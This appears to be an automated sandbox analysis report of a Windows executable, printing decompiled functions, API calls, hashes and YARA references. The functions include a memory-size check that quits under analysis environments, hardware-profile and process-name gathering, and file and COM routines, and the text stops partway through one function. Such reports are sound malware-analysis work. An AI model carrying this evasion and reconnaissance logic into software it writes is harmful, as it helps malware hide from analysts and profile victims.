0x0041f58d
0x0041f590
0x0041f590
0x0041f5a8
0x0041f5bd

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 0041F565
_strlen.LIBCMT ref: 0041F584
_strlen.LIBCMT ref: 0041F598

Strings

Unknown, xrefs: 0041F593, 0041F5A1

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _strlen$CurrentProfile
String ID: Unknown
API String ID: 37792462-1654365787
Opcode ID: b5c0392e0f730e3731b82394a2acfd83c7eea3ede270e1bf4fd8372f32fe0fc4
Instruction ID: 0e45eb4eed70eae2475e9c7459afac3899935032b21396084ba27ee723908e6f
Opcode Fuzzy Hash: b5c0392e0f730e3731b82394a2acfd83c7eea3ede270e1bf4fd8372f32fe0fc4
Instruction Fuzzy Hash: 2D01AEB1A00218EBDB20DF65EC05BAE77F8FB05708F10416EED4157241EF799A1887DA

Uniqueness

Uniqueness Score: -1.00%

Function 00401130 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00401130(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
				signed int _v8;
				struct _MEMORYSTATUSEX _v72;
				signed int _t12;
				unsigned int _t17;
				intOrPtr _t18;
				signed int _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				signed int _t27;
				unsigned int _t31;

				_t26 = __esi;
				_t25 = __edi;
				_t18 = __ebx;
				_t12 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t12 ^ _t27;
				_t15 = E0042A2F0( &_v72, 0, 0x40);
				_v72.dwLength = 0x40;
				GlobalMemoryStatusEx( &_v72); // executed
				if(_t15 != 1) {
					L4:
					ExitProcess(0);
				}
				_t17 = _v72.ullAvailPhys;
				_t23 = (_t17 << 0x00000020 | _v72.ullTotalPhys) >> 0x14;
				_t15 = _t17 >> 0x14;
				_t31 = _t17 >> 0x14;
				if(_t31 <= 0 && (_t31 < 0 || _t23 < 0x309)) {
					goto L4;
				}
				return E0042A36A(_t15, _t18, _v8 ^ _t27, _t24, _t25, _t26);
			}

0x00401130
0x00401130
0x00401130
0x00401136
0x0040113d
0x00401148
0x00401154
0x0040115b
0x00401164
0x00401181
0x00401183
0x00401183
0x00401166
0x0040116c
0x00401170
0x00401173
0x00401175
0x00000000
0x00000000
0x00401196

APIs

_memset.LIBCMT ref: 00401148
GlobalMemoryStatusEx.KERNEL32(?), ref: 0040115B
ExitProcess.KERNEL32 ref: 00401183

Strings

@, xrefs: 00401154

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: ExitGlobalMemoryProcessStatus_memset
String ID: @
API String ID: 2847449748-2766056989
Opcode ID: ab882ef53c3eaa676605ded33af8c52d6065e1215a785dba49d634de60bdbaa1
Instruction ID: dce120284a3a42dd92e45e563a79d8ce96b4917c5334a4d6c669de9df8202c3b
Opcode Fuzzy Hash: ab882ef53c3eaa676605ded33af8c52d6065e1215a785dba49d634de60bdbaa1
Instruction Fuzzy Hash: DDF09671E0020CBBDB18DFA0E955B6D73B8EB08704F504039EF0AEA2D1EB78A915865D

Uniqueness

Uniqueness Score: -1.00%

Function 00400100 Relevance: 6.7, APIs: 3, Instructions: 2227memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00401010
_memset.LIBCMT ref: 00401036
VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00401050

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Virtual$AllocFree_memset
String ID:
API String ID: 577486340-0
Opcode ID: 933dcc89e090eb74dedec9d8db7fc204688c67a5d4a2c93c9ee25e78e802f4f1
Instruction ID: 098452fbf7d1e38792b337e4bae92f0587bd57fec8ec5eb141f60115286cef04
Opcode Fuzzy Hash: 933dcc89e090eb74dedec9d8db7fc204688c67a5d4a2c93c9ee25e78e802f4f1
Instruction Fuzzy Hash: BF5163A684E3C05FE71387B06C696917FB09E23214B1E41DBD4C1EF2E3E16C595AC36A

Uniqueness

Uniqueness Score: -1.00%

Function 0041EF90 Relevance: 6.1, APIs: 4, Instructions: 70
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E0041EF90(intOrPtr _a4, intOrPtr* _a8, signed char _a12) {
				void* _v8;
				char _v12;
				char* _t16;
				intOrPtr* _t18;
				intOrPtr* _t20;
				void* _t22;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr* _t34;
				signed int _t39;
				void* _t41;
				char* _t42;
				void* _t44;
				intOrPtr* _t45;

				_t16 =  &_v8;
				_t29 = 0;
				_v8 = 0;
				__imp__CoCreateInstance(0x44756c, 0, 1, 0x4467a0, _t16); // executed
				if(_t16 >= 0) {
					__imp__#2(_a4, _t41);
					_t42 = _t16;
					if(_t42 != 0) {
						_t20 = _v8;
						_t22 =  *((intOrPtr*)( *((intOrPtr*)( *_t20 + 0x20))))(_t20, _t42, _t44); // executed
						_t45 = __imp__#6;
						if(_t22 >= 0) {
							_t24 = _v8;
							_t39 =  ~(_a12 & 0x000000ff);
							asm("sbb edx, edx");
							_t26 =  *((intOrPtr*)( *((intOrPtr*)( *_t24 + 0xb4))))(_t24, _t39,  &_v12); // executed
							if(_t26 >= 0) {
								_t27 = E0042E03F(_v12);
								_t34 = _a8;
								 *(_t34 + 4) = _t39;
								 *_t34 = _t27;
								_t29 = 1;
								 *_t45(_v12);
							}
						}
						 *_t45(_t42);
					}
					_t18 = _v8;
					 *((intOrPtr*)( *((intOrPtr*)( *_t18 + 8))))(_t18); // executed
				}
				return _t29;
			}

0x0041ef97
0x0041efa2
0x0041efaa
0x0041efad
0x0041efb5
0x0041efbc
0x0041efc2
0x0041efc6
0x0041efc8
0x0041efd3
0x0041efd5
0x0041efdd
0x0041efdf
0x0041efec
0x0041efee
0x0041eff8
0x0041effc
0x0041f002
0x0041f007
0x0041f00a
0x0041f014
0x0041f016
0x0041f018
0x0041f018
0x0041effc
0x0041f01b
0x0041f01d
0x0041f01e
0x0041f027
0x0041f029
0x0041f030

APIs

CoCreateInstance.OLE32(0044756C,00000000,00000001,004467A0,?,00000000,00000010,?), ref: 0041EFAD
SysAllocString.OLEAUT32(?), ref: 0041EFBC
SysFreeString.OLEAUT32(00000000), ref: 0041F01B

Part of subcall function 0042E03F: __wcstoi64.LIBCMT ref: 0042E04B

SysFreeString.OLEAUT32(?), ref: 0041F018

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: String$Free$AllocCreateInstance__wcstoi64
String ID:
API String ID: 3478848241-0
Opcode ID: 04f285d76c10930fe10630c000d21560c6ea90376c5e936409cbc0fafc45d84e
Instruction ID: 918acc3160710a60c8716b9210b9d938900db9b66e7a5f16667fc09b5c96ffe9
Opcode Fuzzy Hash: 04f285d76c10930fe10630c000d21560c6ea90376c5e936409cbc0fafc45d84e
Instruction Fuzzy Hash: 22118175700118AFD700DFA9DC80D9ABBB9EFC9704B14806AE908C7311DA36EE46DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00423560 Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00423560(intOrPtr __ebx, char* _a4, long _a8) {
				signed int _v8;
				char _v268;
				int _v272;
				void* __edi;
				void* __esi;
				signed int _t11;
				intOrPtr _t22;
				void* _t28;
				char* _t29;
				signed int _t30;

				_t22 = __ebx;
				_t11 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t11 ^ _t30;
				_t29 = _a4;
				_v272 = 0;
				_t28 = OpenProcess(0x410, 0, _a8);
				if(_t28 != 0) {
					 *0x46488c(_t28, 0,  &_v268, 0x104); // executed
					CloseHandle(_t28);
				}
				 *((intOrPtr*)(_t29 + 0x14)) = 0xf;
				 *(_t29 + 0x10) = 0;
				 *_t29 = 0;
				E00404BC0(_t29,  &_v268, E0042BC70( &_v268));
				return E0042A36A(_t29, _t22, _v8 ^ _t30,  &_v268, _t28, _t29);
			}

0x00423560
0x00423569
0x00423570
0x00423577
0x00423583
0x00423593
0x00423597
0x004235a8
0x004235af
0x004235af
0x004235bb
0x004235c2
0x004235ca
0x004235df
0x004235f5

APIs

OpenProcess.KERNEL32(00000410,00000000,0040CA6B,?,00000010), ref: 0042358D
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104,?,00000010), ref: 004235A8
CloseHandle.KERNEL32(00000000,?,00000010), ref: 004235AF
_strlen.LIBCMT ref: 004235CD

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess_strlen
String ID:
API String ID: 3600082427-0
Opcode ID: 5b64cda2c60b1a4d7bd94060169e0e94a616f75f2f850b4ceb589696bbbf28bf
Instruction ID: 0ceb56d2f471f02b9ac60d3ba435a2e2c8e05977df83d27948ddc3c9c7d48c2c
Opcode Fuzzy Hash: 5b64cda2c60b1a4d7bd94060169e0e94a616f75f2f850b4ceb589696bbbf28bf
Instruction Fuzzy Hash: FC01DD75600218ABD710EF55EC05BEE77F8EB85704F00419DF94597280EBF46A848B99

Uniqueness

Uniqueness Score: -1.00%

Function 004205F0 Relevance: 6.0, APIs: 4, Instructions: 37
fileCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E004205F0(CHAR* _a4) {
				void* _v8;
				char _v12;
				void* _t6;
				void* _t8;
				void* _t16;

				_t6 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed
				_t16 = _t6;
				if(_t16 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_t8 =  *0x4646ac(_t16,  &_v12);
					_push(_t16);
					if(_t8 != 0) {
						CloseHandle();
						return _v12;
					} else {
						CloseHandle();
						goto L3;
					}
				}
			}

0x0042060d
0x00420613
0x00420618
0x00420630
0x00420638
0x0042061a
0x0042061f
0x00420625
0x00420628
0x0042063b
0x0042064b
0x0042062a
0x0042062a
0x00000000
0x0042062a
0x00420628

APIs

CreateFileA.KERNEL32(0040C2C0,80000000,00000003,00000000,00000003,00000080,00000000,?,0040C2C0,?), ref: 0042060D
GetFileSizeEx.KERNEL32(00000000,?), ref: 0042061F
CloseHandle.KERNEL32(00000000), ref: 0042062A
CloseHandle.KERNEL32(00000000), ref: 0042063B

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: CloseFileHandle$CreateSize
String ID:
API String ID: 4148174661-0
Opcode ID: 4fb1a9453aba4006a4411be05102b2caeb713c639def4f5cdc54226816ca9811
Instruction ID: 4f281acf0137f3cfa2e4a9074c5ccd3d59e74462d86409dcd0e93f3961685ccb
Opcode Fuzzy Hash: 4fb1a9453aba4006a4411be05102b2caeb713c639def4f5cdc54226816ca9811
Instruction Fuzzy Hash: DCF0E0316411147BD710DBA8EC09F9B77ACDB55721F014261FD40A31D0E6B4691186F9

Uniqueness

Uniqueness Score: -1.00%

Function 004000C9 Relevance: 5.7, APIs: 3, Instructions: 1237memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00401010
_memset.LIBCMT ref: 00401036
VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00401050

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Virtual$AllocFree_memset
String ID:
API String ID: 577486340-0
Opcode ID: fdd63d89ce59c5772cac41d087b0fcff34f6cfa4354a0a324c784cc10fb06231
Instruction ID: cd3e3775527857842ed5a29569c1dedbfda7ad8912d19d7800d6934305f95220
Opcode Fuzzy Hash: fdd63d89ce59c5772cac41d087b0fcff34f6cfa4354a0a324c784cc10fb06231
Instruction Fuzzy Hash: A651A4A284E3C04FD71383B02C696917FB09E23214B1E40DBD8C1DF1E3E15D495AD36A

Uniqueness

Uniqueness Score: -1.00%

Function 00423D90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00423D90(void* __edi, intOrPtr _a4, char* _a8) {
				char _v8;
				char _v16;
				char _v20;
				char _v92;
				char _v168;
				char _v172;
				signed int _t30;
				intOrPtr _t55;
				signed int _t57;
				void* _t58;

				_push(0xffffffff);
				_push(E0043FB5F);
				_push( *[fs:0x0]);
				_t30 =  *0x451f00; // 0xc21d6f0a
				_push(_t30 ^ _t57);
				 *[fs:0x0] =  &_v16;
				_v8 = 0;
				_v20 = 0;
				E00422A20( &_v172, 2, 1);
				 *((intOrPtr*)(_t58 - 0x9c)) = _a8;
				_v8 = 1;
				E00421EE0( &_v172,  &_v172); // executed
				_t55 = _a4;
				E00423BC0( &_v172, _t55);
				_v20 = 1;
				_a8 =  &_v92;
				 *((intOrPtr*)(_t57 +  *((intOrPtr*)(_v172 + 4)) - 0xa8)) = 0x446b24;
				_v8 = 2;
				_v168 = 0x446ae4;
				E004209E0( &_v168);
				E00418260( &_v168, __edi);
				_t22 = _v172 + 4; // 0x44ac34
				 *((intOrPtr*)(_t57 +  *_t22 - 0xa8)) = 0x446ad0;
				_v8 = 0;
				_v92 = 0x445de4;
				E00429F19( &_v92);
				 *[fs:0x0] = _v16;
				return _t55;
			}

0x00423d93
0x00423d95
0x00423da0
0x00423da8
0x00423daf
0x00423db3
0x00423dc3
0x00423dca
0x00423dd1
0x00423de0
0x00423de3
0x00423dea
0x00423def
0x00423df9
0x00423e0a
0x00423e11
0x00423e14
0x00423e25
0x00423e2c
0x00423e36
0x00423e41
0x00423e4c
0x00423e52
0x00423e5e
0x00423e62
0x00423e69
0x00423e76
0x00423e82

APIs

Part of subcall function 00421EE0: std::_Lockit::_Lockit.LIBCPMT ref: 00421F94

Part of subcall function 00418260: std::_Lockit::_Lockit.LIBCPMT ref: 00418286

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00423E69

Part of subcall function 00429F19: std::ios_base::_Tidy.LIBCPMT ref: 00429F3A

Strings

PMA, xrefs: 00423E62
B, xrefs: 00423E52

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: LockitLockit::_std::_std::ios_base::_$Ios_base_dtorTidy
String ID: PMA$B
API String ID: 598088192-1475184249
Opcode ID: c5b46990f121f8a60de083d9edcbf2a15338550ad4952d395b05368434bad9d1
Instruction ID: aba32f83be6ffdd44990a64793511a84961dd6c734ac1c543ba29f3153f411a4
Opcode Fuzzy Hash: c5b46990f121f8a60de083d9edcbf2a15338550ad4952d395b05368434bad9d1
Instruction Fuzzy Hash: 49215171A00258EFDB10DF94D945BDDBBB4EF05314F10819AD84967281DBB96A48CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0040462B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0040462B(intOrPtr* __ecx, void* __edi, intOrPtr _a4, char _a8) {
				char* _v20;
				signed int _t16;
				signed int _t21;
				intOrPtr _t26;
				intOrPtr _t29;
				intOrPtr* _t31;
				void* _t36;
				intOrPtr _t37;
				char* _t39;
				intOrPtr* _t40;
				void* _t49;

				_t36 = __edi;
				_t31 = __ecx;
				_t39 = _v20;
				if( *(_t39 + 0x14) >= 0x10) {
					_push( *_t39);
					E0042A289();
					_t49 = _t49 + 4;
				}
				 *(_t39 + 0x14) = 0xf;
				 *((intOrPtr*)(_t39 + 0x10)) = 0;
				 *_t39 = 0;
				E0042C5C1(0, 0);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t26 = _a4;
				_push(_t39);
				_t40 = _t31;
				if(_t26 > 0xfffffffe) {
					E00429799("string too long");
				}
				_t16 =  *(_t40 + 0x14);
				if(_t16 >= _t26) {
					if(_a8 == 0 || _t26 >= 0x10) {
						if(_t26 == 0) {
							 *((intOrPtr*)(_t40 + 0x10)) = _t26;
							if(_t16 >= 0x10) {
								_t40 =  *_t40;
							}
							 *_t40 = 0;
						}
						asm("sbb eax, eax");
						return  ~_t16;
					} else {
						_push(_t36);
						_t37 =  *((intOrPtr*)(_t40 + 0x10));
						if(_t26 < _t37) {
							_t37 = _t26;
						}
						if(_t16 >= 0x10) {
							_t29 =  *_t40;
							if(_t37 != 0) {
								E0042B8D0(_t40, _t29, _t37);
								_t49 = _t49 + 0xc;
							}
							_push(_t29);
							_t16 = E0042A289();
							_t26 = _a4;
						}
						 *((intOrPtr*)(_t40 + 0x10)) = _t37;
						 *(_t40 + 0x14) = 0xf;
						 *((char*)(_t37 + _t40)) = 0;
						asm("sbb eax, eax");
						return  ~_t16;
					}
				} else {
					_t21 = E004044F0(_t31, _t26,  *((intOrPtr*)(_t40 + 0x10))); // executed
					asm("sbb eax, eax");
					return  ~_t21;
				}
			}

0x0040462b
0x0040462b
0x0040462b
0x00404632
0x00404636
0x00404637
0x0040463c
0x0040463c
0x00404641
0x00404648
0x00404651
0x00404654
0x00404659
0x0040465a
0x0040465b
0x0040465c
0x0040465d
0x0040465e
0x0040465f
0x00404664
0x00404667
0x00404668
0x0040466d
0x00404674
0x00404674
0x00404679
0x0040467e
0x0040469c
0x004046ee
0x004046f0
0x004046f6
0x004046f8
0x004046f8
0x004046fa
0x004046fa
0x00404701
0x00404708
0x004046a3
0x004046a3
0x004046a4
0x004046a9
0x004046ab
0x004046ab
0x004046b0
0x004046b2
0x004046b6
0x004046bb
0x004046c0
0x004046c0
0x004046c3
0x004046c4
0x004046c9
0x004046cc
0x004046cf
0x004046d2
0x004046db
0x004046e2
0x004046e9
0x004046e9
0x00404680
0x00404685
0x0040468e
0x00404695
0x00404695

APIs

__CxxThrowException@8.LIBCMT ref: 00404654
std::_Xinvalid_argument.LIBCPMT ref: 00404674

Strings

string too long, xrefs: 0040466F

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_
String ID: string too long
API String ID: 3614006799-2556327735
Opcode ID: b433765be9a970e515f10d35f9a1820f5f9f2498e7c06d8f87ec78714bb97233
Instruction ID: 80d2e3d65793a28cbb8021105abd5026e352257ff15c2affb66ec9fb2289b922
Opcode Fuzzy Hash: b433765be9a970e515f10d35f9a1820f5f9f2498e7c06d8f87ec78714bb97233
Instruction Fuzzy Hash: C8F0C2B1200310ABE324AE64E882B1B73A9AB41B15F500E2FF542675C1D3BAF94847A9

Uniqueness

Uniqueness Score: -1.00%

Function 00408BB0 Relevance: 4.6, APIs: 3, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00408BB0(void* __ecx, char _a4, signed char* _a8) {
				char _v8;
				char _v12;
				void* __edi;
				void* __esi;
				void* _t59;
				intOrPtr _t62;
				void* _t74;
				signed char* _t79;
				intOrPtr* _t99;
				void* _t100;
				intOrPtr* _t101;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;

				_t99 = _a4;
				if(_t99 != 0) {
					if( *((intOrPtr*)(_t99 + 0x18)) == 0) {
						goto L1;
					} else {
						if( *((intOrPtr*)(_t99 + 0x7c)) != 0) {
							E00406D80(__ecx, _t99);
							_t104 = _t104 + 4;
						}
						_t59 = E00406BA0( &_a4, _t99,  &_v12,  &_a4,  &_v8);
						_t105 = _t104 + 0x10;
						if(_t59 == 0) {
							_push(_t100);
							_t101 = E0042BDF8( &_v12, _t99, _t100, 0x84);
							_t106 = _t105 + 4;
							if(_t101 == 0) {
								L10:
								return 0xffffff98;
							} else {
								_t62 = E0042BDF8( &_v12, _t99, _t101, 0x4000);
								_t107 = _t106 + 4;
								 *_t101 = _t62;
								 *((intOrPtr*)(_t101 + 0x44)) = _a4;
								 *((intOrPtr*)(_t101 + 0x48)) = _v8;
								 *((intOrPtr*)(_t101 + 0x4c)) = 0;
								if(_t62 != 0) {
									 *((intOrPtr*)(_t101 + 0x40)) = 0;
									 *((intOrPtr*)(_t101 + 0x54)) =  *((intOrPtr*)(_t99 + 0x3c));
									 *((intOrPtr*)(_t101 + 0x50)) = 0;
									 *((intOrPtr*)(_t101 + 0x64)) =  *((intOrPtr*)(_t99 + 0x34));
									 *((intOrPtr*)(_t101 + 0x60)) =  *_t99;
									 *((intOrPtr*)(_t101 + 0x68)) =  *((intOrPtr*)(_t99 + 0xc));
									 *((intOrPtr*)(_t101 + 0x18)) = 0;
									if((0 |  *((intOrPtr*)(_t99 + 0x34)) == 0x00000000) == 0) {
										_t25 = _t101 + 4; // 0x4
										 *((intOrPtr*)(_t101 + 0x24)) = 0;
										 *((intOrPtr*)(_t101 + 0x28)) = 0;
										 *((intOrPtr*)(_t101 + 0x2c)) = 0;
										_t74 = E00406030(_t25); // executed
										_t107 = _t107 + 4;
										if(_t74 == 0) {
											 *((intOrPtr*)(_t101 + 0x40)) = 1;
										}
									}
									 *((intOrPtr*)(_t101 + 0x58)) =  *((intOrPtr*)(_t99 + 0x40));
									 *((intOrPtr*)(_t101 + 0x5c)) =  *((intOrPtr*)(_t99 + 0x44));
									 *(_t101 + 0x6c) =  *(_t99 + 0x30) & 0x00000001;
									if(( *(_t99 + 0x30) >> 0x00000003 & 0x00000001) == 0) {
										 *((char*)(_t101 + 0x80)) =  *((intOrPtr*)(_t99 + 0x3f));
									} else {
										 *((char*)(_t101 + 0x80)) =  *((intOrPtr*)(_t99 + 0x39));
									}
									_t79 = _a8;
									asm("sbb ecx, ecx");
									 *(_t101 + 0x7c) =  ~( *(_t101 + 0x6c) & 0x000000ff) & 0x0000000c;
									 *((intOrPtr*)(_t101 + 0x70)) = 0x12345678;
									 *((intOrPtr*)(_t101 + 0x74)) = 0x23456789;
									 *((intOrPtr*)(_t101 + 0x78)) = 0x34567890;
									if(_t79 != 0) {
										while(1) {
											_t70 =  *_t79 & 0x000000ff;
											if(( *_t79 & 0x000000ff) == 0) {
												goto L20;
											}
											_t49 = _t101 + 0x70; // 0x70
											E00405D50(_t49, _t70);
											_t107 = _t107 + 8;
											_t79 =  &(_t79[1]);
											if(_t79 != 0) {
												continue;
											}
											goto L20;
										}
									}
									L20:
									_t53 = _v12 + 0x1e; // 0x345678ae
									 *((intOrPtr*)(_t101 + 0x3c)) =  *((intOrPtr*)(_t99 + 0x78)) + _t53;
									 *((intOrPtr*)(_t101 + 8)) = 0;
									 *((intOrPtr*)(_t99 + 0x7c)) = _t101;
									return 0;
								} else {
									E0042BE8C(_t101);
									goto L10;
								}
							}
						} else {
							return 0xffffff99;
						}
					}
				} else {
					L1:
					return 0xffffff9a;
				}
			}

0x00408bb8
0x00408bbf
0x00408bcf
0x00000000
0x00408bd1
0x00408bd4
0x00408bd7
0x00408bdc
0x00408bdc
0x00408bec
0x00408bf1
0x00408bf6
0x00408c03
0x00408c0e
0x00408c10
0x00408c15
0x00408c42
0x00408c4d
0x00408c17
0x00408c1c
0x00408c27
0x00408c2a
0x00408c2c
0x00408c2f
0x00408c32
0x00408c37
0x00408c4e
0x00408c59
0x00408c5c
0x00408c65
0x00408c6a
0x00408c70
0x00408c73
0x00408c78
0x00408c7a
0x00408c7e
0x00408c81
0x00408c84
0x00408c87
0x00408c8c
0x00408c91
0x00408c93
0x00408c93
0x00408c91
0x00408c9d
0x00408ca3
0x00408cab
0x00408cb7
0x00408cc7
0x00408cb9
0x00408cbc
0x00408cbc
0x00408cd1
0x00408cd6
0x00408cdb
0x00408cde
0x00408ce5
0x00408cec
0x00408cf5
0x00408cf7
0x00408cf7
0x00408cfc
0x00000000
0x00000000
0x00408cff
0x00408d03
0x00408d08
0x00408d0b
0x00408d0c
0x00000000
0x00000000
0x00000000
0x00408d0c
0x00408cf7
0x00408d0e
0x00408d14
0x00408d18
0x00408d1b
0x00408d22
0x00408d2d
0x00408c39
0x00408c3a
0x00000000
0x00408c3f
0x00408c37
0x00408bf9
0x00408c02
0x00408c02
0x00408bf6
0x00408bc2
0x00408bc2
0x00408bcb
0x00408bcb

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5d58c0e3966e016bc05b6c249a8289962cb14597001e1ddf211dab35930965f
Instruction ID: d5e3a78ca5c0018c963fc2c800439d0d348b4441391483b2250816531f938035
Opcode Fuzzy Hash: b5d58c0e3966e016bc05b6c249a8289962cb14597001e1ddf211dab35930965f
Instruction Fuzzy Hash: 4C51CAB1A04B419FC724CF2AD5805A6FBF4BF18304B004A7EEA9A97B81D735F854CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004040D0 Relevance: 4.6, APIs: 3, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E004040D0(intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, signed char _a8, signed char _a12, intOrPtr* _a16) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v44;
				intOrPtr _v172;
				intOrPtr _v252;
				char _v356;
				intOrPtr* _v360;
				void* __ebx;
				void* __edi;
				signed int _t45;
				intOrPtr* _t52;
				intOrPtr _t58;
				signed char _t64;
				void* _t65;
				intOrPtr _t73;
				intOrPtr* _t74;
				char* _t84;
				intOrPtr _t85;
				signed int _t86;
				intOrPtr _t87;
				signed int _t88;
				void* _t89;
				void* _t90;
				void* _t91;
				void* _t92;

				_t79 = __edx;
				_t45 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t45 ^ _t88;
				_t64 = _a8;
				_t82 = _a4;
				_v360 = _a16;
				if(_a4 != 0) {
					_push(__esi);
					_t84 =  &_v356;
					_v44 = 0;
					_v24 = 0;
					_v16 = 0;
					_v20 = 0;
					_v12 = 0;
					_t49 = E00403B80(_t84, _t82, _t64);
					_t90 = _t89 + 8;
					if(_t49 != 0) {
						L21:
						_pop(_t85);
						return E0042A36A(_t49, _t64, _v8 ^ _t88, _t79, _t82, _t85);
					} else {
						_t49 = E00403C60(_a12, _t65, _t84); // executed
						if(_t49 != 0) {
							goto L21;
						} else {
							_t68 = _a12;
							_t82 = _t84;
							_t49 = E00403D20(_t84, _t84, _t64, _a12);
							_t91 = _t90 + 0xc;
							if(_t49 != 0) {
								goto L21;
							} else {
								_t79 = _t84;
								_t49 = E00403DC0(_t84);
								_t92 = _t91 + 4;
								if(_t49 != 0 || E00403E80(_t82) != 0) {
									goto L21;
								} else {
									_t49 = E00404010(_t68, _t82); // executed
									if(_t49 != 0) {
										goto L21;
									} else {
										_t64 = _a12;
										if((_t64 & 0x00000001) != 0) {
											L12:
											_t52 = _v360;
											if(_t52 == 0) {
												if(_v24 != 0) {
													_t86 = 0;
													if(_v20 > 0) {
														do {
															FreeLibrary( *(_v24 + _t86 * 4));
															_t86 = _t86 + 1;
														} while (_t86 < _v20);
													}
													_t79 = _v24;
													E0042BE8C(_v24);
													_t92 = _t92 + 4;
												}
											} else {
												 *((intOrPtr*)(_t52 + 8)) = _v32;
												 *((intOrPtr*)(_t52 + 0xc)) = _v28;
